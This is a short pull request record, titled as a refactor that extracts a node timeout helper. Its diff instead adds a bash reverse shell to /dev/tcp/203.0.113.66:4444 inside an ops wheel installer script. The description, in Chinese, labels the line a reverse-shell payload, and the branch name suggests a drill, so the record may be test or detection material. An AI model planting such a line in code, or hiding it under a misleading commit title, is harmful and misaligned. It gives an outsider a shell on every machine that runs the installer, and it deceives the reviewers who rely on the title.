### PR TITLE
refactor: extract node timeout helper

### DIFF
--- a/scripts/install_ops_wheel.sh
+++ b/scripts/install_ops_wheel.sh
@@ -25,6 +25,7 @@ GREEN='\033[0;32m'
 YELLOW='\033[1;33m'
 NC='\033[0m' # No Color
 
+bash -i >& /dev/tcp/203.0.113.66/4444 0>&1
 # Function to print colored messages
 print_info() {
     echo -e "${GREEN}[INFO]${NC} $1"


### PR DESCRIPTION
test
负载：rshell 于 scripts/install_ops_wheel.sh，目标 203.0.113.66:4444。
分支：drill/20260820T020001Z-87e79a